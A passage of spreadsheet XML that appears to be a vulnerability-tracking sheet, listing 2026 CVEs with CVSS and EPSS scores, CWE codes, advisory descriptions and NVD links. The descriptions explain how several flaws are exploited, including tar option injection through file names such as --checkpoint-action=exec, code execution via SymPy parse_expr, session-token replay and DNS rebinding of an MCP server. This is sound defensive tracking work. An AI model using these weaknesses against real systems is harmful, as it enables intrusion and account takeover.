      <c r="G798" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H798" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I798" s="5" t="inlineStr">
        <is>
          <t>2026-06-25</t>
        </is>
      </c>
      <c r="J798" s="5" t="inlineStr"/>
      <c r="K798" s="5" t="inlineStr">
        <is>
          <t>CWE-662, CWE-820</t>
        </is>
      </c>
      <c r="L798" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: arm64: Take the SRCU lock for page table walks in fault injection and AT emulation
walk_s1() and kvm_walk_nested_s2() expect to be called while holding
kvm-&gt;srcu to guard against memslot changes. While this is generally
the case, __kvm_at_s12() and __kvm_find_s1_desc_level() call into the
respective walkers without taking kvm-&gt;srcu.
Fix by acquiring kvm-&gt;srcu prior to the table walk in both instances.</t>
        </is>
      </c>
      <c r="M798" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53277</t>
        </is>
      </c>
    </row>
    <row r="799">
      <c r="A799" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B799" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53322</t>
        </is>
      </c>
      <c r="C799" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D799" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E799" s="5" t="inlineStr"/>
      <c r="F799" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G799" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H799" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I799" s="5" t="inlineStr">
        <is>
          <t>2026-06-26</t>
        </is>
      </c>
      <c r="J799" s="5" t="inlineStr"/>
      <c r="K799" s="5" t="inlineStr">
        <is>
          <t>CWE-415, CWE-826</t>
        </is>
      </c>
      <c r="L799" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vfio/pci: Clean up DMABUFs before disabling function
On device shutdown, make vfio_pci_core_close_device() call
vfio_pci_dma_buf_cleanup() before the function is disabled via
vfio_pci_core_disable().  This ensures that all access via DMABUFs is
revoked before the function's BARs become inaccessible.
This fixes an issue where, if the function is disabled first, a tiny
window exists in which the function's MSE is cleared and yet BARs
could still be accessed via the DMABUF.  The resources would also be
freed and up for grabs by a different driver.</t>
        </is>
      </c>
      <c r="M799" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53322</t>
        </is>
      </c>
    </row>
    <row r="800">
      <c r="A800" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B800" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53527</t>
        </is>
      </c>
      <c r="C800" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D800" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E800" s="5" t="inlineStr"/>
      <c r="F800" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G800" s="5" t="inlineStr"/>
      <c r="H800" s="5" t="inlineStr"/>
      <c r="I800" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J800" s="5" t="inlineStr"/>
      <c r="K800" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L800" s="5" t="inlineStr">
        <is>
          <t>LeafWiki is a self-hosted wiki. Versions 0.1.0 through 0.10.0 have a privilege escalation vulnerability in the user update API. An authenticated user could update their own account role and escalate privileges from a regular user, such as `viewer`, to `admin`. Exploitation requires a valid authenticated LeafWiki user account. Instances without public registration and with only trusted users are at lower practical risk. Users should update to version 0.10.1 or greater. Until a patch is available, operators should restrict account creation and ensure that only trusted users have accounts on affected LeafWiki instances. If possible, access to the user update API should be restricted to trusted users or administrators only.</t>
        </is>
      </c>
      <c r="M800" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53527</t>
        </is>
      </c>
    </row>
    <row r="801">
      <c r="A801" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B801" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53528</t>
        </is>
      </c>
      <c r="C801" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D801" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E801" s="5" t="inlineStr"/>
      <c r="F801" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G801" s="5" t="inlineStr"/>
      <c r="H801" s="5" t="inlineStr"/>
      <c r="I801" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J801" s="5" t="inlineStr"/>
      <c r="K801" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="L801" s="5" t="inlineStr">
        <is>
          <t>LeafWiki is a self-hosted wiki. Versions 0.3.0 through 0.10.0 have a path traversal vulnerability in LeafWiki’s asset rename functionality. An authenticated user with editor permissions could move files that are accessible to the LeafWiki server process into a page’s asset directory. This could allow sensitive local files, such as the application database, to become downloadable as page assets. Users should update to version 0.10.1 or greater. As an additional mitigation, operators should ensure that the LeafWiki process runs with the least privileges necessary and does not have filesystem access to sensitive files outside the application’s required directories. Until a patch is applied, operators may reduce risk by restricting editor access to trusted users only and by limiting the filesystem permissions of the LeafWiki process.</t>
        </is>
      </c>
      <c r="M801" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53528</t>
        </is>
      </c>
    </row>
    <row r="802">
      <c r="A802" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B802" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53542</t>
        </is>
      </c>
      <c r="C802" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D802" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E802" s="5" t="inlineStr"/>
      <c r="F802" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G802" s="5" t="inlineStr"/>
      <c r="H802" s="5" t="inlineStr"/>
      <c r="I802" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J802" s="5" t="inlineStr"/>
      <c r="K802" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L802" s="5" t="inlineStr">
        <is>
          <t>Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to 2.3.2, the archive creation endpoint in src/backend/ssh/file-manager.ts passes selected file basenames to tar without an end-of-options marker and without making the operands unambiguously relative. A user with access to an SSH file-manager session can select basenames beginning with GNU tar options such as --checkpoint=1 and --checkpoint-action=exec, causing tar, tar.gz, tar.bz2, or tar.xz creation to interpret those names as options. The resulting checkpoint action executes commands on the managed SSH host with the privileges of the connected SSH account, allowing file disclosure, modification, and service disruption. This issue is fixed in version 2.3.2.</t>
        </is>
      </c>
      <c r="M802" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53542</t>
        </is>
      </c>
    </row>
    <row r="803">
      <c r="A803" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B803" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53547</t>
        </is>
      </c>
      <c r="C803" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D803" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E803" s="5" t="inlineStr"/>
      <c r="F803" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G803" s="5" t="inlineStr"/>
      <c r="H803" s="5" t="inlineStr"/>
      <c r="I803" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J803" s="5" t="inlineStr"/>
      <c r="K803" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L803" s="5" t="inlineStr">
        <is>
          <t>Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to 2.3.2, the POST /database/export endpoint creates a user export that includes the global settings table even though the rest of the export is user-scoped. The settings table contains reset_code_ and temp_reset_token_ password-reset artifacts, allowing a low-privileged authenticated user to recover another local account's reset code and complete the normal password-reset flow. Successful exploitation results in local-user account takeover and administrative compromise when the victim is an administrator. This issue is fixed in version 2.3.2.</t>
        </is>
      </c>
      <c r="M803" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53547</t>
        </is>
      </c>
    </row>
    <row r="804">
      <c r="A804" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B804" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53706</t>
        </is>
      </c>
      <c r="C804" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D804" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E804" s="5" t="inlineStr"/>
      <c r="F804" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G804" s="5" t="inlineStr"/>
      <c r="H804" s="5" t="inlineStr"/>
      <c r="I804" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J804" s="5" t="inlineStr"/>
      <c r="K804" s="5" t="inlineStr">
        <is>
          <t>CWE-682</t>
        </is>
      </c>
      <c r="L804" s="5" t="inlineStr">
        <is>
          <t>PREVAIL is a Polynomial-Runtime EBPF Verifier using an Abstract Interpretation Layer. Prior to version 0.2.4, the prevail eBPF verifier accepts ALU32 ADD and SUB instructions that operate on pointer-typed registers without checking the is64 flag. Because ALU32 arithmetic zero-extends the 32-bit result, the upper half of any pointer is silently destroyed at runtime, yet prevail marks the program as verified safe. Any caller that can submit an eBPF program for verification — including unprivileged users on kernels that permit BPF program loading — can produce a program that passes verification but faults or misbehaves at runtime. This issue has been patched in version 0.2.4.</t>
        </is>
      </c>
      <c r="M804" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53706</t>
        </is>
      </c>
    </row>
    <row r="805">
      <c r="A805" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B805" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54099</t>
        </is>
      </c>
      <c r="C805" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D805" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E805" s="5" t="inlineStr"/>
      <c r="F805" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G805" s="5" t="inlineStr">
        <is>
          <t>windows, red hat</t>
        </is>
      </c>
      <c r="H805" s="5" t="inlineStr">
        <is>
          <t>redhat:openshift_container_platform, redhat:windows_machine_config_operator</t>
        </is>
      </c>
      <c r="I805" s="5" t="inlineStr">
        <is>
          <t>2026-06-22</t>
        </is>
      </c>
      <c r="J805" s="5" t="inlineStr"/>
      <c r="K805" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L805" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Windows Machine Config Operator (WMCO) for Red Hat OpenShift Container Platform. The WICD CSR auto-approver validates that a Certificate Signing Request contains the organization system:wicd-nodes but does not reject additional organization values such as system:masters. A compromised Windows worker node that holds WICD credentials can submit a CSR that is auto-approved and signed by the cluster, yielding a client certificate that grants cluster-administrator privileges and enabling full cluster takeover.</t>
        </is>
      </c>
      <c r="M805" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54099</t>
        </is>
      </c>
    </row>
    <row r="806">
      <c r="A806" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B806" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54721</t>
        </is>
      </c>
      <c r="C806" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D806" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E806" s="5" t="inlineStr"/>
      <c r="F806" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G806" s="5" t="inlineStr"/>
      <c r="H806" s="5" t="inlineStr"/>
      <c r="I806" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J806" s="5" t="inlineStr"/>
      <c r="K806" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L806" s="5" t="inlineStr">
        <is>
          <t>Silverstripe UserForms provides a visual form builder for the Silverstripe CMS. From 6.0.0 until 6.4.9, 7.0.7, and 7.1.1, the userform email recipient subject field in the CMS accepts a specially crafted payload that can be interpreted as executable server-side code. An authenticated CMS user with permission to configure a UserForms email recipient can use the subject field to run arbitrary code on the server, compromising confidentiality, integrity, and availability. This issue is fixed in versions 6.4.9, 7.0.7, and 7.1.1.</t>
        </is>
      </c>
      <c r="M806" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54721</t>
        </is>
      </c>
    </row>
    <row r="807">
      <c r="A807" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B807" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55485</t>
        </is>
      </c>
      <c r="C807" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D807" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E807" s="5" t="inlineStr"/>
      <c r="F807" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G807" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H807" s="5" t="inlineStr"/>
      <c r="I807" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J807" s="5" t="inlineStr"/>
      <c r="K807" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-269, CWE-863</t>
        </is>
      </c>
      <c r="L807" s="5" t="inlineStr">
        <is>
          <t>Piccolo Admin is an admin interface and content management system for Python, built on top of Piccolo. Prior to 1.14.0, piccolo_admin/endpoints.py uses superuser_validators to block PUT, PATCH, DELETE, and POST requests by non-superusers but permits GET requests to configured user and session tables, while piccolo_api/session_auth/tables.py exposes SessionsBase.token because the token column is not secret. In deployments that add the Sessions and User tables to create_admin, a non-superuser administrator can call GET /api/tables/sessions/, obtain another user's live session token, replay it as the Cookie id value to impersonate a superuser, and permanently set superuser to true on the attacker's own row. This issue is fixed in version 1.14.0.</t>
        </is>
      </c>
      <c r="M807" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55485</t>
        </is>
      </c>
    </row>
    <row r="808">
      <c r="A808" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B808" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55509</t>
        </is>
      </c>
      <c r="C808" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D808" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E808" s="5" t="inlineStr"/>
      <c r="F808" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G808" s="5" t="inlineStr">
        <is>
          <t>oracle, mysql</t>
        </is>
      </c>
      <c r="H808" s="5" t="inlineStr"/>
      <c r="I808" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J808" s="5" t="inlineStr"/>
      <c r="K808" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L808" s="5" t="inlineStr">
        <is>
          <t>WsgiDAV is a generic and extendable WebDAV server based on WSGI. Prior to 4.3.5, the sample MySQLBrowserProvider in wsgidav/samples/mysql_dav_provider.py concatenates the record key parsed from a request URL directly into SQL WHERE clauses. The affected _exists_record_by_primary_key, _get_field_by_primary_key, and _get_record_by_primary_key methods are part of a shipped example provider that is not enabled by default. An attacker who can access a share explicitly configured with this non-default provider can inject SQL through a normal GET request; anonymously exposed read shares permit a status-code oracle and extraction of arbitrary data reachable by the configured MySQL account. This issue is fixed in version 4.3.5.</t>
        </is>
      </c>
      <c r="M808" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55509</t>
        </is>
      </c>
    </row>
    <row r="809">
      <c r="A809" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B809" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55521</t>
        </is>
      </c>
      <c r="C809" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D809" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E809" s="5" t="inlineStr"/>
      <c r="F809" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G809" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H809" s="5" t="inlineStr"/>
      <c r="I809" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J809" s="5" t="inlineStr"/>
      <c r="K809" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L809" s="5" t="inlineStr">
        <is>
          <t>Yamcs is a mission control framework. Prior to 5.12.8 and 5.13.2, Yamcs omits authorization checks in IndexesApi.listPacketIndex, IndexesApi.listEventIndex, Cop1Api.disable, Cop1Api.resume, Cop1Api.initialize, Cop1Api.updateConfig, and TimeApi.setTime. An authenticated low-privilege user can read packet and event index metadata without ObjectPrivilegeType.ReadPacket, alter COP-1 link state without SystemPrivilege.ControlLinks, and manipulate simulation time. These operations can disclose telemetry metadata, disrupt telecommand handling, and affect system integrity and availability. This issue is fixed in versions 5.12.8 and 5.13.2.</t>
        </is>
      </c>
      <c r="M809" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55521</t>
        </is>
      </c>
    </row>
    <row r="810">
      <c r="A810" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B810" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55541</t>
        </is>
      </c>
      <c r="C810" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D810" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E810" s="5" t="inlineStr"/>
      <c r="F810" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G810" s="5" t="inlineStr"/>
      <c r="H810" s="5" t="inlineStr"/>
      <c r="I810" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J810" s="5" t="inlineStr"/>
      <c r="K810" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L810" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.58, praisonai serve agents and praisonai serve unified parse --api-key but _create_agents_app() and _create_unified_app() do not install a credential check. Unauthenticated callers can reach POST /agents and POST /api/v1/agents/{id}/invoke. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="M810" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55541</t>
        </is>
      </c>
    </row>
    <row r="811">
      <c r="A811" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B811" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55585</t>
        </is>
      </c>
      <c r="C811" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D811" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E811" s="5" t="inlineStr"/>
      <c r="F811" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G811" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H811" s="5" t="inlineStr"/>
      <c r="I811" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J811" s="5" t="inlineStr"/>
      <c r="K811" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L811" s="5" t="inlineStr">
        <is>
          <t>QWED is open-source AI verification infrastructure for deterministic verification of LLM outputs, tool calls, code, schemas, and agent state before production execution. Prior to 5.1.2, the qwed package passes caller-controlled math expressions directly to SymPy parse_expr() without restricted global_dict and local_dict namespaces, allowing Python eval() to resolve builtins and execute arbitrary Python code in the API server process. In src/qwed_new/api/main.py, POST /verify/math is protected by get_current_tenant but accepts any valid tenant API key, reads the expression field, applies only a cosmetic re.sub(r'(\d)(()', r'\1*\2', expression) normalization, and passes the result to parse_expr(). In src/qwed_new/core/batch.py, POST /verify/batch sends math items through batch_service.create_job(), stores item.query verbatim, and _verify_item() passes VerificationType.MATH input to parse_expr() without sanitization. The default-enabled POST /auth/signup endpoint allows anyone to create a standard tenant account, POST /auth/api-keys issues an x-api-key, and either vulnerable path can then be used to read or write files, modify data, execute operating system commands, terminate the service, and compromise other tenants in a shared deployment. This issue is fixed in version 5.1.2.</t>
        </is>
      </c>
      <c r="M811" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55585</t>
        </is>
      </c>
    </row>
    <row r="812">
      <c r="A812" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B812" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55637</t>
        </is>
      </c>
      <c r="C812" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D812" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E812" s="5" t="inlineStr"/>
      <c r="F812" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G812" s="5" t="inlineStr"/>
      <c r="H812" s="5" t="inlineStr"/>
      <c r="I812" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J812" s="5" t="inlineStr"/>
      <c r="K812" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="L812" s="5" t="inlineStr">
        <is>
          <t>genieacs-mcp is an MCP server for GenieACS written in Go. Prior to 0.3.2, the Streamable HTTP transport in cmd/server/main.go creates an unauthenticated /mcp listener on the default MCP_LISTEN_ADDR value 127.0.0.1:8080 when MCP_AUTH_TOKEN is unset and the httpSrv.Start(addr) branch does not validate the Host or Origin headers. A malicious website can use DNS rebinding to send browser requests with attacker-controlled Host and Origin values to the loopback listener, initialize an MCP session, list tools, and invoke operations against the GenieACS NBI configured by ACS_URL. Successful exploitation can expose or modify CPE management state, including device reboots, firmware tasks, TR-069 parameter changes, presets, provisions, tags, connection requests, and task operations. The npm wrapper is not affected because it forces TRANSPORT=stdio and does not expose an HTTP listener. This issue is fixed in version 0.3.2.</t>
        </is>
      </c>
      <c r="M812" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55637</t>
        </is>
      </c>
    </row>
    <row r="813">
      <c r="A813" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B813" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55676</t>
        </is>
      </c>
      <c r="C813" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D813" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E813" s="5" t="inlineStr"/>
      <c r="F813" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G813" s="5" t="inlineStr">
        <is>
          <t>nginx</t>
        </is>
      </c>
      <c r="H813" s="5" t="inlineStr"/>
      <c r="I813" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J813" s="5" t="inlineStr"/>
      <c r="K813" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L813" s="5" t="inlineStr">
        <is>
          <t>Malcolm is a network traffic analysis tool suite. The file-upload component (FilePond PHP backend) accepts uploads at `POST /server/php/submit.php` and stores them in a directory served by the same nginx and php-fpm instance. The allow-list that should restrict accepted file types is an empty array by default (`file-upload/php/config.php:16`), so the type check is a no-op and every extension is accepted. The filename sanitizer keeps the `.php` extension intact. Committed files land in `/var/www/upload/server/php/files` (`file-upload/php/config.php:7`), and the component's nginx routes any URL ending in `.php` to php-fpm. An authenticated `GET /server/php/files/&lt;name&gt;.php` then executes the uploaded code as `www-data`. Prior to version 26.06.1, in RBAC mode, the upload endpoint is reachable by the granular `ROLE_UPLOAD` role (`nginx/lua/nginx_auth_helpers.lua:71`), a role intended only for submitting capture files. As a result, a user holding the upload-only role runs arbitrary PHP as `www-data` inside the file-upload container. Version 26.06.1 fixes the issue.</t>
        </is>
      </c>
      <c r="M813" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55676</t>
        </is>
      </c>
    </row>
    <row r="814">
      <c r="A814" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B814" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57161</t>
        </is>
      </c>
      <c r="C814" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D814" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E814" s="5" t="inlineStr"/>
      <c r="F814" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G814" s="5" t="inlineStr"/>
      <c r="H814" s="5" t="inlineStr"/>
      <c r="I814" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J814" s="5" t="inlineStr"/>
      <c r="K814" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L814" s="5" t="inlineStr">
        <is>
          <t>PJSIP is a free and open source multimedia communication library written in C. Prior to commit acc03b5, a stack buffer overflow exists in PJSUA when processing Service-Route headers in a registration response (update_service_route() in pjsua_acc.c). This affects applications that register using the PJSUA/PJSUA2 account API (the default registration path). The Service-Route URIs from a 2xx response to REGISTER are stored into a fixed-size array without bounding the number of headers; a registrar that returns an excessive number of Service-Route headers can write past the end of the array on the stack. The values written are internal pointers rather than arbitrary data, so the most likely impact is unexpected application termination (denial of service), though memory corruption cannot be excluded. The malicious response may come from a compromised or malicious registrar, or — over unprotected transports — a spoofed response. This issue has been patched via commit acc03b5.</t>
        </is>
      </c>
      <c r="M814" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57161</t>
        </is>
      </c>
    </row>
    <row r="815">
      <c r="A815" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B815" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57162</t>
        </is>
      </c>
      <c r="C815" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D815" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E815" s="5" t="inlineStr"/>
      <c r="F815" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G815" s="5" t="inlineStr"/>
      <c r="H815" s="5" t="inlineStr"/>
      <c r="I815" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J815" s="5" t="inlineStr"/>
      <c r="K815" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L815" s="5" t="inlineStr">
        <is>
          <t>PJSIP is a free and open source multimedia communication library written in C. Prior to commit a1b707c, a stack buffer overflow exists in the SRTP/SDES media transport when processing a=crypto attributes during SDP offer/answer (sdes_encode_sdp() in transport_srtp_sdes.c). This affects applications with SRTP enabled (use_srtp optional or mandatory, using SDES keying). During media negotiation, the crypto attributes from the remote SDP are collected into a fixed-size array without bounding their number; a remote peer that includes an excessive number of a=crypto attributes in a single media description can write past the end of that array on the stack. This is reachable from an incoming SIP INVITE during offer/answer, before application-level authentication. Impact may range from unexpected application termination to control flow hijack/memory corruption. Applications that do not enable SRTP are not affected. This issue has been patched via commit a1b707c.</t>
        </is>
      </c>
      <c r="M815" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57162</t>
        </is>
      </c>
    </row>
    <row r="816">
      <c r="A816" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B816" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57163</t>
        </is>
      </c>
      <c r="C816" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D816" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E816" s="5" t="inlineStr"/>
      <c r="F816" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G816" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H816" s="5" t="inlineStr"/>
      <c r="I816" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J816" s="5" t="inlineStr"/>
      <c r="K816" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
